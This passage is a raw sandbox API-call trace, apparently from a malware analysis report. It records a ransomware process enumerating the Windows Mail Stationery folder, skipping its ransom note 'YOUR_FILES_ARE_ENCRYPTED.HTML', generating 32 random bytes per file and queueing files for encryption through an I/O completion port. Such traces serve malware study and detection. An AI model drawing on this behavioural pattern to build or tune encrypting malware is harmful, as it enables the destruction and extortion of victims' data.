ftLastWriteTime.dwHighDateTime=0x1cb88f5, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0163.756] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 71 [0163.756] GetProcessHeap () returned 0x270000 [0163.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.756] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" [0163.756] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*" [0163.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.758] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.759] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e4d104, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0163.759] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 81 [0163.759] lstrcmpW (lpString1="Bears.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.759] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0163.759] lstrlenW (lpString=".htm") returned 4 [0163.759] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0163.759] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.759] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=255) returned 1 [0163.759] CloseHandle (hObject=0x5b8) returned 1 [0163.759] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8267651c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0163.759] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 81 [0163.760] lstrcmpW (lpString1="Bears.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.760] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0163.760] lstrlenW (lpString=".jpg") returned 4 [0163.760] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0163.760] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.760] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1074) returned 1 [0163.760] GetProcessHeap () returned 0x270000 [0163.760] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.761] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="15") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="AA") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="29") returned 2 
[0163.761] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BF") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="AB") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="BD") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="FD") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="0C") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D4") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="B5") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="B1") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A5") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BB") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="EB") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="13") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="E1") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="97") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="FC") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="AC") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="43") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="FE") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="93") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9A") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="2B") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: 
param_1="84") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7D") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="4C") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D8") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="96") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="AD") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C5") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0B") returned 2 [0163.762] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" [0163.762] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.763] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.766] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe21ca9ab, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0163.766] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 83 [0163.766] lstrcmpW (lpString1="Desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.766] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0163.766] lstrlenW (lpString=".ini") returned 4 [0163.766] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0163.766] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e73264, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0163.766] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 82 [0163.767] lstrcmpW (lpString1="Garden.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.767] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0163.767] lstrlenW (lpString=".htm") returned 4 [0163.767] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0163.767] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.775] GetFileSizeEx (in: hFile=0x5b8, 
lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=231) returned 1 [0163.775] CloseHandle (hObject=0x5b8) returned 1 [0163.775] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82780ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0163.775] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 82 [0163.775] lstrcmpW (lpString1="Garden.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.775] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0163.775] lstrlenW (lpString=".jpg") returned 4 [0163.775] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0163.775] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.776] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=23871) returned 1 [0163.776] GetProcessHeap () returned 0x270000 [0163.776] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0163.781] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="4E") returned 2 
[0163.781] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="D9") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DB") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="91") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="69") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="D9") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="BF") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="CB") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D9") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="13") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="7A") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="B2") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="21") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="D0") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="6D") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="7C") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="25") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="42") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="E7") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="90") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="06") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="59") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: 
param_1="2D") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="E2") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F9") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="41") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="F3") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="29") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="15") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="F5") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="30") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="66") returned 2 [0163.783] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" [0163.783] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.783] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0163.783] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ebf524, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="Green Bubbles.htm", cAlternateFileName="GREENB~1.HTM")) returned 1 [0163.783] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 89 [0163.783] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.783] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0163.783] lstrlenW (lpString=".htm") returned 4 [0163.783] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0163.783] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.784] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0163.784] CloseHandle (hObject=0x594) returned 1 [0163.784] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827cd17c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x0, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="GREENB~1.JPG")) returned 1 [0163.784] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\GreenBubbles.jpg") returned 88 [0163.784] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.784] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0163.784] lstrlenW (lpString=".jpg") returned 4 [0163.784] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0163.784] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.784] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6406) returned 1 [0163.784] GetProcessHeap () returned 0x270000 [0163.784] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0163.787] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C3") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="CC") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="18") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="93") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="BB") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="11") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="04") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="43") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A0") returned 2 [0163.787] wsprintfW (in: 
param_1=0x4ebd136, param_2="%02X" | out: param_1="77") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="BF") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="F8") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="23") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="72") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="83") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="01") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="42") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="8F") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="28") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="78") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="00") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="A8") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="49") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="EF") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="38") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="63") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="B0") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D6") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="54") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="F6") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="8D") returned 2 
[0163.788] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="78") returned 2 [0163.789] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" [0163.789] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.789] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0163.789] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f0b7e4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="HANDPR~1.HTM")) returned 1 [0163.789] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 87 [0163.789] lstrcmpW (lpString1="Hand Prints.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.789] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0163.789] lstrlenW (lpString=".htm") returned 4 [0163.789] PathFindExtensionW 